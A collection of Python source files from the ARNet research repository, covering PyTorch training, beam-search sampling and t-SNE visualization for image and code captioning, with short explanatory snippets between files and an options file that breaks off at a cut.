{
"source": "201528014227051/ARNet",
"score": 2
}
#### File: ARNet/code_captioning/code_caption_soft_att_rcst.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import ipdb
import random
import numpy as np
import torch
import torch.optim as optim
from torch.autograd import Variable
import opts
from utils_model import *
from class_soft_att_rcst import *
# Note: train_data, val_data and token2index are assumed to be provided by the
# data-loading code of the original repo (e.g. via utils_model); they are not defined in this file.
def ARNet(opt):
if os.path.isdir(opt.rcst_model_save_path) is False:
os.mkdir(opt.rcst_model_save_path)
torch.manual_seed(opt.seed)
torch.cuda.manual_seed(opt.seed)
model = AttEncodeDecodeARNet(opt)
model.load_state_dict(torch.load(opt.rcst_model_base_path))
model.cuda()
model.train()
encode_decode_criterion = EncodeDecodeCriterion()
current_learning_rate = opt.learning_rate
optimizer = optim.Adam(model.parameters(),
lr=current_learning_rate,
betas=(opt.optim_alpha, opt.optim_beta),
weight_decay=opt.optim_weight_decay)
train_data_index = list(range(len(train_data)))
val_data_index = list(range(len(val_data)))
iter_idx = 0
max_score = 0.0
max_epoch = 0
for epoch in range(opt.max_epochs):
random.shuffle(train_data_index)
if epoch != 0 and epoch % opt.learning_rate_decay_every == 0:
current_learning_rate *= opt.learning_rate_decay_rate
set_lr(optimizer, current_learning_rate)
for start, end in zip(range(0, len(train_data_index), opt.batch_size),
range(opt.batch_size, len(train_data_index), opt.batch_size)):
time_start = time.time()
# wait for synchronize
torch.cuda.synchronize()
current_code_matrix = []
current_comment_matrix = []
current_comment_mask = []
current_comment_next = []
current_batch_index = train_data_index[start:end]
for idx in current_batch_index:
current_code_matrix.append(train_data[idx]['code_matrix'])
current_comment_matrix.append(train_data[idx]['comment_matrix'])
current_comment_mask.append(train_data[idx]['comment_mask'])
current_comment_next.append(train_data[idx]['comment_next'])
current_code_matrix = np.reshape(current_code_matrix, [-1, opt.code_truncate])
current_comment_matrix = np.reshape(current_comment_matrix, [-1, opt.comment_truncate])
current_comment_mask = np.reshape(current_comment_mask, [-1, opt.comment_truncate])
current_comment_next = np.reshape(current_comment_next, [-1, opt.comment_truncate])
current_code_matrix_cuda = Variable(torch.from_numpy(current_code_matrix), requires_grad=False).cuda()
current_comment_matrix_cuda = Variable(torch.from_numpy(current_comment_matrix), requires_grad=False).cuda()
current_comment_mask_cuda = Variable(torch.from_numpy(current_comment_mask), requires_grad=False).cuda()
current_comment_next_cuda = Variable(torch.from_numpy(current_comment_next), requires_grad=False).cuda()
optimizer.zero_grad()
decode_logit_seq, rcst_loss = model.forward(current_code_matrix_cuda,
current_comment_matrix_cuda, current_comment_mask_cuda)
encode_decode_loss = encode_decode_criterion.forward(decode_logit_seq,
current_comment_next_cuda, current_comment_mask_cuda)
# backward
total_loss = encode_decode_loss + rcst_loss
total_loss.backward()
# update params
optimizer.step()
# wait for synchronize
torch.cuda.synchronize()
encode_decode_loss_val = encode_decode_loss.data[0]
rcst_loss_val = rcst_loss.data[0]
iter_idx += 1
time_end = time.time()
print("{} {} epoch: {} lr: {:.8f} encode_decode_loss: {:.3f} rcst_loss: {:.3f} time: {:.3f}".format(iter_idx,
start, epoch, current_learning_rate, encode_decode_loss_val, rcst_loss_val, time_end - time_start))
if np.mod(epoch, 1) == 0:
print("\nepoch {} is done, saving the model ...".format(epoch))
parameter_path = os.path.join(opt.rcst_model_save_path, 'model_epoch-' + str(epoch) + '.pth')
torch.save(model.state_dict(), parameter_path)
print("\nparameter model saved to {}".format(parameter_path))
optimizer_path = os.path.join(opt.rcst_model_save_path, 'optimizer_epoch-' + str(epoch) + '.pth')
torch.save(optimizer.state_dict(), optimizer_path)
print("\noptimizer model saved to {}".format(optimizer_path))
model.eval()
greedy_results = []
gts_data = []
for start, end in zip(range(0, len(val_data_index), opt.batch_size),
range(opt.batch_size, len(val_data_index), opt.batch_size)):
current_code_matrix = []
current_comment_matrix = []
current_comment_mask = []
current_comment_next = []
current_batch_index = val_data_index[start:end]
for idx in current_batch_index:
current_code_matrix.append(val_data[idx]['code_matrix'])
current_comment_matrix.append(val_data[idx]['comment_matrix'])
current_comment_mask.append(val_data[idx]['comment_mask'])
current_comment_next.append(val_data[idx]['comment_next'])
current_code_matrix = np.reshape(current_code_matrix, [-1, opt.code_truncate])
current_code_matrix_cuda = Variable(torch.from_numpy(current_code_matrix), requires_grad=False).cuda()
current_comment_next = np.reshape(current_comment_next, [-1, opt.comment_truncate])
greedy_seq, greedy_seq_probs, greedy_logprobs_all = model.sample(current_code_matrix_cuda,
token2index['BOS'], token2index['EOS'])
greedy_seq = greedy_seq.squeeze().cpu().numpy()
for i in range(greedy_seq.shape[0]):
greedy_results.append(greedy_seq[i])
gts_data.append(current_comment_next[i])
avg_score = get_scores(greedy_results, gts_data, token2index['BOS'], token2index['EOS'])
if avg_score[0] >= max_score:
max_score = avg_score[0]
max_epoch = epoch
print("epoch: {} Bleu_1: {:.5f} Bleu_2: {:.5f} Bleu_3: {:.5f} Bleu_4: {:.5f} max_epoch: {}".format(epoch,
avg_score[0], avg_score[1], avg_score[2], avg_score[3], max_epoch))
if __name__ == '__main__':
opt = opts.parse_opt()
ARNet(opt)
```
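The training and validation loops above build mini-batches by zipping two `range` objects, which silently drops the final partial batch. A minimal, self-contained sketch of that slicing pattern with toy values (not the real data):

```python
# mini-batch slicing as used above, on a toy index list
data_index = list(range(10))   # pretend we have 10 training examples
batch_size = 4

for start, end in zip(range(0, len(data_index), batch_size),
                      range(batch_size, len(data_index), batch_size)):
    print(data_index[start:end])
# prints [0, 1, 2, 3] and [4, 5, 6, 7]; the trailing partial batch [8, 9] is skipped
```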
#### File: ARNet/code_captioning/prepro_tsne_reduction_vis.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import ipdb
import time
import math
import argparse
import numpy as np
import matplotlib.pyplot as plt
from six.moves import cPickle
from sklearn import manifold
def plot_embedding(X, batch_size, title=None):
x_min, x_max = np.min(X, 0), np.max(X, 0)
X = (X - x_min) / (x_max - x_min)
fig = plt.figure()
fig.suptitle(title, fontsize=14, fontweight='bold')
ax = fig.add_subplot(111)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
for i in range(X.shape[0]):
if i < batch_size:
ax.plot(X[i, 0], X[i, 1], color='yellowgreen', marker='.') # teacher forcing hidden states
else:
ax.plot(X[i, 0], X[i, 1], color='orangered', marker='.') # free running hidden states
def cosine_similarity(v1, v2):
"""
compute cosine similarity of v1 to v2: (v1 dot v2)/{||v1||*||v2||)
"""
sumxx, sumxy, sumyy = 0, 0, 0
for i in range(len(v1)):
x = v1[i]
y = v2[i]
sumxx += x*x
sumyy += y*y
sumxy += x*y
return 1.0 - sumxy / math.sqrt(sumxx * sumyy)
def dim_reduction(opt):
teacher_forcing_hidden_reduction = []
free_running_hidden_reduction = []
for start, end in [(opt.vis_batch_size * opt.truncation, opt.vis_batch_size * (opt.truncation + 1))]:
current_teacher_forcing_hidden = teacher_forcing_hidden[start:end, :]
current_free_running_hidden = free_running_hidden[start:end, :]
current_hidden = np.concatenate((current_teacher_forcing_hidden, current_free_running_hidden), axis=0)
tsne = manifold.TSNE(n_components=2, init='pca', random_state=0)
current_hidden_reduction = tsne.fit_transform(current_hidden)
teacher_forcing_hidden_reduction.append(current_hidden_reduction[0:opt.vis_batch_size, :])
free_running_hidden_reduction.append(current_hidden_reduction[opt.vis_batch_size:, :])
teacher_forcing_hidden_reduction = np.reshape(teacher_forcing_hidden_reduction, [-1, 2])
free_running_hidden_reduction = np.reshape(free_running_hidden_reduction, [-1, 2])
hidden_reduction = np.concatenate((teacher_forcing_hidden_reduction, free_running_hidden_reduction), axis=0)
return hidden_reduction
def calculate_distance(teacher_forcing_hidden, free_running_hidden):
bsize = free_running_hidden.shape[0]
mean_teacher_forcing = np.mean(teacher_forcing_hidden, axis=0)
mean_free_running = np.mean(free_running_hidden, axis=0)
distance_mc = np.sqrt(np.sum(np.square(mean_teacher_forcing - mean_free_running)))
distance_pw = np.sqrt(np.sum(np.square(teacher_forcing_hidden - free_running_hidden), 1))
print("distance_mc: {}".format(distance_mc))
print("distance_pw: {}".format(np.sum(distance_pw) / bsize))
# cosine distance
distance_cosine = 0.0
for i in range(bsize):
current_tf_h = teacher_forcing_hidden[i]
current_fr_h = free_running_hidden[i]
distance_cosine += cosine_similarity(current_tf_h, current_fr_h)
print("cosine distance_pw: {}".format(distance_cosine / bsize))
print("cosine distance_mc: {}".format(cosine_similarity(mean_teacher_forcing, mean_free_running)))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--hidden_path', type=str,
default='example: models/soft_attention_seed_117/model_epoch-51_hidden_states.pkl')
parser.add_argument('--hidden_reduction_save_path', type=str,
default='example: models/soft_attention_seed_117/model_epoch-51_hidden_states_reduction.pkl')
parser.add_argument('--vis_batch_size', type=int, default=80)
parser.add_argument('--truncation', type=int, default=20)
opt = parser.parse_args()
with open(opt.hidden_path, 'rb') as f:
hidden_states = cPickle.load(f)
teacher_forcing_hidden = np.squeeze(hidden_states['teacher_forcing'])
free_running_hidden = np.squeeze(hidden_states['free_running'])
# calculate the distances
calculate_distance(teacher_forcing_hidden, free_running_hidden)
# dimensionality reduction
hidden_reduction = dim_reduction(opt)
with open(opt.hidden_reduction_save_path, 'wb') as f:
cPickle.dump(hidden_reduction, f)
# visualize the hidden states after dimensionality reduction
plot_embedding(hidden_reduction, opt.vis_batch_size, "t-SNE visualization")
plt.show()
```
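For reference, the per-element loop in `cosine_similarity` above (which returns a cosine *distance*, 1 − cos) can be cross-checked against a vectorized NumPy version; a small sketch with arbitrary vectors:

```python
import numpy as np

def cosine_distance_np(v1, v2):
    # vectorized equivalent of the loop above: 1 - (v1 . v2) / (||v1|| * ||v2||)
    return 1.0 - np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))

v1 = np.array([1.0, 2.0, 3.0])
v2 = np.array([0.5, 0.1, 2.0])
print(cosine_distance_np(v1, v2))  # should agree with cosine_similarity(v1, v2) above
```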
#### File: ARNet/image_captioning/class_ende.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import ipdb
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import *
from classLSTMCore import LSTMCore
class EncoderDecoder(nn.Module):
def __init__(self, opt):
super(EncoderDecoder, self).__init__()
self.vocab_size = opt.vocab_size
self.input_encoding_size = opt.input_encoding_size
self.lstm_size = opt.lstm_size
self.drop_prob_lm = opt.drop_prob_lm
self.seq_length = opt.seq_length
self.fc_feat_size = opt.fc_feat_size
self.img_embed = nn.Linear(self.fc_feat_size, self.input_encoding_size)
self.LSTMCore = LSTMCore(self.input_encoding_size, self.lstm_size, self.drop_prob_lm)
self.embed = nn.Embedding(self.vocab_size + 1, self.input_encoding_size)
self.logit = nn.Linear(self.lstm_size, self.vocab_size)
self.init_weights()
def init_weights(self):
initrange = 0.1
self.img_embed.weight.data.uniform_(-initrange, initrange)
self.img_embed.bias.data.fill_(0)
self.embed.weight.data.uniform_(-initrange, initrange)
self.logit.weight.data.uniform_(-initrange, initrange)
self.logit.bias.data.fill_(0)
def init_hidden(self, batch_size):
weight = next(self.parameters()).data
return (Variable(weight.new(1, batch_size, self.lstm_size).zero_()),
Variable(weight.new(1, batch_size, self.lstm_size).zero_()))
def forward(self, fc_feats, seq):
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
outputs = []
for i in range(seq.size(1)):
if i == 0:
xt = self.img_embed(fc_feats)
else:
it = seq[:, i-1].clone()
if seq[:, i-1].data.sum() == 0:
break
xt = self.embed(it)
output, state = self.LSTMCore.forward(xt, state)
if i > 0:
output = F.log_softmax(self.logit(output.squeeze(0)))
outputs.append(output)
return torch.cat([_.unsqueeze(1) for _ in outputs], 1).contiguous()
def sample_beam(self, fc_feats, init_index, opt={}):
beam_size = opt.get('beam_size', 3)  # default to 3 if 'beam_size' is not provided in opt
batch_size = fc_feats.size(0)
seq = torch.LongTensor(self.seq_length, batch_size).zero_()
seqLogprobs = torch.FloatTensor(self.seq_length, batch_size)
top_seq = []
top_prob = [[] for _ in range(batch_size)]
done_beams = [[] for _ in range(batch_size)]
for k in range(batch_size):
state = self.init_hidden(beam_size)
beam_seq = torch.LongTensor(self.seq_length, beam_size).zero_()
beam_seq_logprobs = torch.FloatTensor(self.seq_length, beam_size).zero_()
beam_logprobs_sum = torch.zeros(beam_size) # running sum of logprobs for each beam
for t in range(self.seq_length + 1):
if t == 0:
xt = self.img_embed(fc_feats[k:k+1]).expand(beam_size, self.input_encoding_size)
elif t == 1:
it = fc_feats.data.new(beam_size).long().fill_(init_index)
xt = self.embed(Variable(it, requires_grad=False))
else:
logprobsf = logprobs.float()
ys, ix = torch.sort(logprobsf, 1, True)
candidates = []
cols = min(beam_size, ys.size(1))
rows = beam_size
if t == 2: # at first time step only the first beam is active
rows = 1
for c in range(cols):
for q in range(rows):
# compute logprob of expanding beam q with word in (sorted) position c
local_logprob = ys[q, c]
candidate_logprob = beam_logprobs_sum[q] + local_logprob
candidates.append({'c': ix.data[q, c],
'q': q,
'p': candidate_logprob.data[0],
'r': local_logprob.data[0]})
candidates = sorted(candidates, key=lambda x: -x['p'])
# construct new beams
new_state = [_.clone() for _ in state]
if t > 2:
# we'll need these as reference when we fork beams around
beam_seq_prev = beam_seq[:t-2].clone()
beam_seq_logprobs_prev = beam_seq_logprobs[:t-2].clone()
for vix in range(beam_size):
v = candidates[vix]
# fork beam index q into index vix
if t > 2:
beam_seq[:t - 2, vix] = beam_seq_prev[:, v['q']]
beam_seq_logprobs[:t - 2, vix] = beam_seq_logprobs_prev[:, v['q']]
# rearrange recurrent states
for state_ix in range(len(new_state)):
# copy over state in previous beam q to new beam at vix
new_state[state_ix][0, vix] = state[state_ix][0, v['q']] # dimension one is time step
# append new end terminal at the end of this beam
beam_seq[t - 2, vix] = v['c'] # c'th word is the continuation
beam_seq_logprobs[t - 2, vix] = v['r'] # the raw logprob here
beam_logprobs_sum[vix] = v['p'] # the new (sum) logprob along this beam
if v['c'] == 0 or t == self.seq_length:
# END token special case here, or we reached the end.
# add the beam to a set of done beams
done_beams[k].append({'seq': beam_seq[:, vix].clone(),
'logps': beam_seq_logprobs[:, vix].clone(),
'p': beam_logprobs_sum[vix]})
# encode as vectors
it = beam_seq[t - 2]
xt = self.embed(Variable(it.cuda()))
if t >= 2:
state = new_state
output, state = self.LSTMCore.forward(xt, state)
logprobs = F.log_softmax(self.logit(output))
done_beams[k] = sorted(done_beams[k], key=lambda x: -x['p'])
seq[:, k] = done_beams[k][0]['seq'] # the first beam has highest cumulative score
seqLogprobs[:, k] = done_beams[k][0]['logps']
# save result
l = len(done_beams[k])
top_seq_cur = torch.LongTensor(l, self.seq_length).zero_()
for temp_index in range(l):
top_seq_cur[temp_index] = done_beams[k][temp_index]['seq'].clone()
top_prob[k].append(done_beams[k][temp_index]['p'])
top_seq.append(top_seq_cur)
# return the samples and their log likelihoods
return seq.transpose(0, 1), seqLogprobs.transpose(0, 1), top_seq, top_prob
def sample(self, fc_feats, init_index, opt={}):
beam_size = opt.get('beam_size', 1)
if beam_size > 1:
return self.sample_beam(fc_feats, init_index, opt)
batch_size = fc_feats.size(0)
seq = []
seqLogprobs = []
logprobs_all = []
state = self.init_hidden(batch_size)
for t in range(self.seq_length):
if t == 0:
xt = self.img_embed(fc_feats)
else:
if t == 1:
it = fc_feats.data.new(batch_size).long().fill_(init_index)
else:
sampleLogprobs, it = torch.max(logprobs.data, 1)
it = it.view(-1).long()
xt = self.embed(Variable(it, requires_grad=False).cuda())
if t >= 2:
if t == 2:
unfinished = it > 0
else:
unfinished *= (it > 0)
if unfinished.sum() == 0:
break
it = it * unfinished.type_as(it)
seq.append(it)
seqLogprobs.append(sampleLogprobs.view(-1))
output, state = self.LSTMCore.forward(xt, state)
logprobs = F.log_softmax(self.logit(output))
logprobs_all.append(logprobs)
return torch.cat([_.unsqueeze(1) for _ in seq], 1), \
torch.cat([_.unsqueeze(1) for _ in seqLogprobs], 1), \
torch.cat([_.unsqueeze(1) for _ in logprobs_all], 1).contiguous()
def teacher_forcing_get_hidden_states(self, fc_feats, seq):
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
outputs = []
for i in range(seq.size(1)):
if i == 0:
xt = self.img_embed(fc_feats)
else:
it = seq[:, i-1].clone()
if seq[:, i-1].data.sum() == 0:
break
xt = self.embed(it)
output, state = self.LSTMCore.forward(xt, state)
if i > 0:
if batch_size == 1:
output = F.log_softmax(self.logit(output))
else:
output = F.log_softmax(self.logit(output.squeeze(0)))
outputs.append(output)
return state[0], outputs
def free_running_get_hidden_states(self, fc_feats, init_index, end_index):
batch_size = fc_feats.size(0)
seq = []
seqLogprobs = []
logprobs_all = []
state = self.init_hidden(batch_size)
for t in range(self.seq_length):
if t == 0:
xt = self.img_embed(fc_feats)
if t == 1:
it = fc_feats.data.new(batch_size).long().fill_(init_index)
xt = self.embed(Variable(it, requires_grad=False).cuda())
if t >= 2:
sampleLogprobs, it = torch.max(logprobs.data, 1)
it = it.view(-1).long()
if it.cpu().numpy()[0] == end_index:
break
xt = self.embed(Variable(it, requires_grad=False).cuda())
seq.append(it)
seqLogprobs.append(sampleLogprobs.view(-1))
output, state = self.LSTMCore.forward(xt, state)
logprobs = F.log_softmax(self.logit(output))
logprobs_all.append(logprobs)
return state[0], logprobs_all
```
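The heart of `sample_beam` above is the candidate bookkeeping: every surviving beam is extended by each high-scoring word, and the extensions are re-ranked by cumulative log-probability `'p'`. A stripped-down, self-contained sketch of that ranking step with made-up numbers:

```python
beam_size = 3
# each candidate: word index 'c', source beam 'q', cumulative logprob 'p', local logprob 'r'
candidates = [
    {'c': 7,  'q': 0, 'p': -1.2, 'r': -1.2},
    {'c': 12, 'q': 0, 'p': -0.4, 'r': -0.4},
    {'c': 3,  'q': 0, 'p': -2.5, 'r': -2.5},
    {'c': 9,  'q': 0, 'p': -0.9, 'r': -0.9},
]
candidates = sorted(candidates, key=lambda x: -x['p'])
top = candidates[:beam_size]
print([c['c'] for c in top])   # [12, 9, 7] -- the three most promising continuations
```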
#### File: ARNet/image_captioning/image_caption_ende_xe.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import ipdb
import random
import numpy as np
from six.moves import cPickle
import torch
import torch.optim as optim
from torch.autograd import *
import opts
from utils_model import *
from class_ende import *
# Note: idx_to_word, word_to_idx, train_images_captions_index, index_to_sentence and evaluate
# are assumed to come from utils_model or the original repo's data-loading code.
def train_xe(opt):
opt.vocab_size = len(idx_to_word)
max_CIDEr = 0.0
max_CIDEr_epoch = 0
torch.manual_seed(opt.seed)
torch.cuda.manual_seed(opt.seed)
model = EncoderDecoder(opt)
model.cuda()
model.train()
criterion = LanguageModelCriterion()
# check compatibility if training is continued from previously saved model
if vars(opt).get('start_from', None) is not None:
assert os.path.isdir(opt.start_from), " %s must be a path" % opt.start_from
model.load_state_dict(torch.load(os.path.join(opt.start_from,
'model_epoch-' + str(opt.start_from_epoch) + '.pth')))
current_learning_rate = opt.learning_rate
if opt.optim == 'adam':
optimizer = optim.Adam(model.parameters(),
lr=current_learning_rate,
betas=(opt.optim_alpha, opt.optim_beta),
weight_decay=opt.optim_weight_decay)
else:
raise Exception("optim not supported: {}".format(opt.feature_type))
# load optimizer
if vars(opt).get('start_from', None) is not None:
optimizer.load_state_dict(torch.load(os.path.join(opt.start_from,
'optimizer_epoch-' + str(opt.start_from_epoch) + '.pth')))
set_lr(optimizer, opt.scst_learning_rate)
for epoch in range(opt.max_epochs):
random.shuffle(train_images_names)
if epoch != opt.learning_rate_decay_start and epoch % opt.learning_rate_decay_every == 0:
current_learning_rate *= opt.learning_rate_decay_rate
set_lr(optimizer, current_learning_rate)
for start, end in zip(range(0, len(train_images_names), int(opt.batch_size/opt.seq_per_img)),
range(int(opt.batch_size/opt.seq_per_img), len(train_images_names), int(opt.batch_size/opt.seq_per_img))):
time_start = time.time()
# wait for synchronize
torch.cuda.synchronize()
current_feats_fc = []
current_gt_sents = []
image_names = train_images_names[start:end]
for image_name in image_names:
img_feat_fc = np.load(os.path.join(opt.fc_feat_path, image_name + '.npy'))
img_feat_fc = np.reshape(img_feat_fc, [opt.fc_feat_size])
for i in range(opt.seq_per_img):
current_feats_fc.append(img_feat_fc)
current_gt_sents.append(train_images_captions_index[image_name][i])
current_feats_fc = np.reshape(current_feats_fc, [-1, opt.fc_feat_size])
current_gt_sents = np.asarray(current_gt_sents).astype(np.int64)
current_masks = np.zeros((current_gt_sents.shape[0], current_gt_sents.shape[1]), dtype=np.float32)
# in PY3, map is a generator, refer: https://stackoverflow.com/questions/44511752
nonzeros = np.array(list(map(lambda x: (x != 0).sum(), current_gt_sents)))
for ind, row in enumerate(current_masks):
row[:nonzeros[ind]] = 1
current_feats_fc_cuda = Variable(torch.from_numpy(current_feats_fc), requires_grad=False).cuda()
current_gt_sents_cuda = Variable(torch.from_numpy(current_gt_sents), requires_grad=False).cuda()
current_masks_cuda = Variable(torch.from_numpy(current_masks), requires_grad=False).cuda()
# zero gradient
optimizer.zero_grad()
criterion_input = model.forward(current_feats_fc_cuda, current_gt_sents_cuda)
loss = criterion.forward(criterion_input, current_gt_sents_cuda[:, 1:], current_masks_cuda)
# backward
loss.backward()
# clip gradient
# clip_gradient(optimizer, opt.grad_clip)
# update params
optimizer.step()
train_loss = loss.data[0]
# wait for synchronize
torch.cuda.synchronize()
time_end = time.time()
print("idx: {} epoch: {} lr: {:.10f} loss: {:.3f} time: {:.3f}".format(start, epoch, current_learning_rate, train_loss, time_end - time_start))
if np.mod(epoch, 1) == 0:
print("epoch {} is done, saving the model ...".format(epoch))
parameter_path = os.path.join(opt.xe_model_save_path, 'model_epoch-' + str(epoch) + '.pth')
torch.save(model.state_dict(), parameter_path)
print("parameter model saved to {}".format(parameter_path))
optimizer_path = os.path.join(opt.xe_model_save_path, 'optimizer_epoch-' + str(epoch) + '.pth')
torch.save(optimizer.state_dict(), optimizer_path)
print("optimizer model saved to {}".format(optimizer_path))
model.eval()
val_images_sents = []
for idx, image_name in enumerate(val_images_names):
img_feat_fc = np.load(os.path.join(opt.fc_feat_path, image_name + '.npy'))
img_feat_fc = np.reshape(img_feat_fc, [1, opt.fc_feat_size])
img_feat_fc_cuda = Variable(torch.from_numpy(img_feat_fc), requires_grad=False).cuda()
greedy_seq, _, _ = model.sample(img_feat_fc_cuda, word_to_idx['BOS'], {'sample_max': 1})
img_sent = index_to_sentence(list(greedy_seq.cpu().numpy().squeeze(0)))
val_images_sents.append(img_sent)
Bleu_1, Bleu_2, Bleu_3, Bleu_4, CIDEr, METEOR, ROUGE_L, SPICE = evaluate(opt.train_json_path, val_images_names, val_images_sents)
model.train()
if CIDEr >= max_CIDEr:
max_CIDEr = CIDEr
max_CIDEr_epoch = epoch
print('current_CIDEr: {:.5f} max_CIDEr: {:.5f} max_CIDEr_epoch: {}'.format(CIDEr, max_CIDEr, max_CIDEr_epoch))
if epoch - max_CIDEr_epoch > opt.early_stop_value:
print('CIDEr has no improvement, stop. Max CIDEr value: {}, max epoch: {}'.format(max_CIDEr, max_CIDEr_epoch))
sys.exit(0)
if __name__ == '__main__':
opt = opts.parse_opt()
if opt.version == 'offline':
train_images_names = open(opt.train_split, 'r').read().splitlines() + open(opt.restval_split, 'r').read().splitlines()
val_images_names = open(opt.val_split, 'r').read().splitlines()
elif opt.version == 'online':
train_images_names = open(opt.train_split_online, 'r').read().splitlines()
val_images_names = open(opt.val_split_online, 'r').read().splitlines()
if os.path.isdir(opt.xe_model_save_path) is False:
os.mkdir(opt.xe_model_save_path)
train_xe(opt)
```
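The mask construction in the training loop above (count the non-zero tokens of each padded caption, then set that many leading entries of the mask row to 1) can be seen in isolation; a small NumPy sketch with toy token ids:

```python
import numpy as np

# toy padded captions: 0 is the padding token
current_gt_sents = np.array([[5, 8, 2, 0, 0],
                             [3, 1, 4, 9, 0]], dtype=np.int64)
current_masks = np.zeros(current_gt_sents.shape, dtype=np.float32)

nonzeros = np.array(list(map(lambda x: (x != 0).sum(), current_gt_sents)))
for ind, row in enumerate(current_masks):
    row[:nonzeros[ind]] = 1

print(current_masks)
# [[1. 1. 1. 0. 0.]
#  [1. 1. 1. 1. 0.]]
```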
#### File: ARNet/image_captioning/opts.py
```python
import argparse
import sys
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--device', type=int, default=0)
parser.add_argument('--function', type=str, default='train_with_mle')
parser.add_argument('--version', type=str, default='offline')
parser.add_argument('--train_annotations', type=str, default='data/annotations/captions_train2014.json')
parser.add_argument('--val_annotations', type=str, default='data/annotations/captions_val2014.json')
# karpathy's splits
parser.add_argument('--train_split', type=str, default='data/splits/coco_train.txt')
parser.add_argument('--test_split', type=str, default='data/splits/coco_test.txt')
parser.add_argument('--val_split', type=str, default='data/splits/coco_val.txt')
parser.add_argument('--restval_split', type=str, default='data/splits/coco_restval.txt')
# official splits
parser.add_argument('--train_split_online', type=str, default='data/splits/coco_train_online.txt')
parser.add_argument('--val_split_online', type=str, default='data/splits/coco_val_online.txt')
# params of preprocessed data
parser.add_argument('--train_val_imageNames_to_imageIDs_path', type=str, default='data/train_val_imageNames_to_imageIDs.pkl')
parser.add_argument('--official_train_captions_path', type=str, default='data/train_images_captions_official.pkl')
parser.add_argument('--official_val_captions_path', type=str, default='data/val_images_captions_official.pkl')
parser.add_argument('--train_images_captions_path', type=str, default='data/train_images_captions.pkl')
parser.add_argument('--val_images_captions_path', type=str, default='data/val_images_captions.pkl')
parser.add_argument('--word_to_idx_path', type=str, default='data/word_to_idx.pkl')
parser.add_argument('--idx_to_word_path', type=str, default='data/idx_to_word.pkl')
parser.add_argument('--bias_init_vector_path', type=str, default='data/bias_init_vector.pkl')
parser.add_argument('--train_images_captions_index', type=str, default='data/train_images_captions_index.pkl')
# params of focal loss
parser.add_argument('--focal_gamma', type=float, default=2)
# batch normalization
parser.add_argument('--epsilon', type=float, default=0.001)
# label smoothing
parser.add_argument('--label_smoothing', type=float, default=0.1)
# params of t-SNE visualization
parser.add_argument('--vis_batch_size', type=int, default=64)
parser.add_argument('--vis_model_path', type=str, default='')
parser.add_argument('--vis_save_path', type=str, default='')
# ARNet
parser.add_argument('--rcst_time', type=int, default=1)
parser.add_argument('--rcst_size', type=int, default=512)
parser.add_argument('--rcst_weight', type=float, default=0.005)
parser.add_argument('--rcst_learning_rate', type=float, default=0.0005)
parser.add_argument('--rcst_model_save_path', type=str, default='')
parser.add_argument('--rcst_model_path', type=str, default='')
parser.add_argument('--rcst_train_json_path', type=str, default='')
# params of ZoneOut
parser.add_argument('--zoneout_factor_cell', type=float, default=0.1)
parser.add_argument('--zoneout_factor_output', type=float, default=0.0)
# ensemble model
parser.add_argument('--ensemble_file_path', type=str, default='data/splits/coco_test.txt')
parser.add_argument('--ensemble_json_path', type=str, default='')
parser.add_argument('--ensemble_model_0', type=str, default='')
parser.add_argument('--ensemble_model_1', type=str, default='')
parser.add_argument('--ensemble_model_2', type=str, default='')
parser.add_argument('--ensemble_model_3', type=str, default='')
parser.add_argument('--ensemble_model_4', type=str, default='')
parser.add_argument('--ensemble_model_5', type=str, default='')
# inference function parameters
parser.add_argument('--infer_file_path', type=str, default='data/splits/coco_test.txt')
parser.add_argument('--infer_json_path', type=str, default='')
parser.add_argument('--infer_model_path', type=str, default='')
# self-critical training function parameters
parser.add_argument('--grad_clip', type=float, default=0.1,
help='clip gradients at this value')
parser.add_argument('--scst_learning_rate', type=float, default=0.00005)
parser.add_argument('--scst_learning_rate_decay', type=float, default=0.8)
parser.add_argument('--scst_loss_mixed_gamma', type=float, default=0.0016)
parser.add_argument('--scst_batch_size', type=int, default=8)
parser.add_argument('--scst_epochs', type=int, default=200)
parser.add_argument('--reward_method', type=str, default='CIDEr')
parser.add_argument('--scst_base_model_path', type=str, default='')
parser.add_argument('--scst_model_save_path', type=str, default='')
parser.add_argument('--scst_train_json_path', type=str, default='')
# caption_with_beam_search function parameters
parser.add_argument('--beam_model_path', type=str, default='')
parser.add_argument('--beam_file_path', type=str, default='data/splits/coco_test.txt')
parser.add_argument('--beam_json_path', type=str, default='')
parser.add_argument('--beam_size', type=int, default=1)
parser.add_argument('--beam_length_normalization_factor', type=float, default=0.0)
# from <NAME>
parser.add_argument('--train_only', type=int, default=0)
parser.add_argument('--caption_model', type=str, default='caption_model')
parser.add_argument('--input_json', type=str, default='data/cocotalk.json')
parser.add_argument('--input_label_h5', type=str, default='data/cocotalk_label.h5')
parser.add_argument('--load_best_score', type=int, default=0)
parser.add_argument('--temperature', type=float, default=1.0)
# parameters and paths for XE (cross-entropy) training
parser.add_argument('--train_json_path', type=str, default='')
parser.add_argument('--model_save_basepath', type=str, default='models')
parser.add_argument('--model_name', type=str, default='')
parser.add_argument('--xe_model_save_path', type=str, default='')
# resume training from a previously saved model checkpoint
parser.add_argument('--start_from', type=str, default=None)
parser.add_argument('--start_from_epoch', type=int, default=0)
parser.add_argument('--use_cuda', type=bool, default=True)
parser.add_argument('--seed', type=int, default=110)
parser.add_argument('--max_epochs', type=int, default=100)
parser.add_argument('--seq_per_img', type=int, default=5)
parser.add_argument('--batch_size', type=int, default=80)
parser.add_argument('--early_stop_value', type=int, default=10)
# params of optimizer
parser.add_argument('--optim', type=str, default='adam')
parser.add_argument('--learning_rate', type=float, default=5e-4)
parser.add_argument('--learning_rate_decay_start', type=int, default=0)
parser.add_argument('--learning_rate_decay_every', type=int, default=3)
parser.add_argument('--learning_rate_decay_rate', type=float, default=0.8,)
parser.add_argument('--optim_alpha', type=float, default=0.9)
parser.add_argument('--optim_beta', type=float, default=0.999)
parser.add_argument('--optim_epsilon', type=float, default=1e-8)
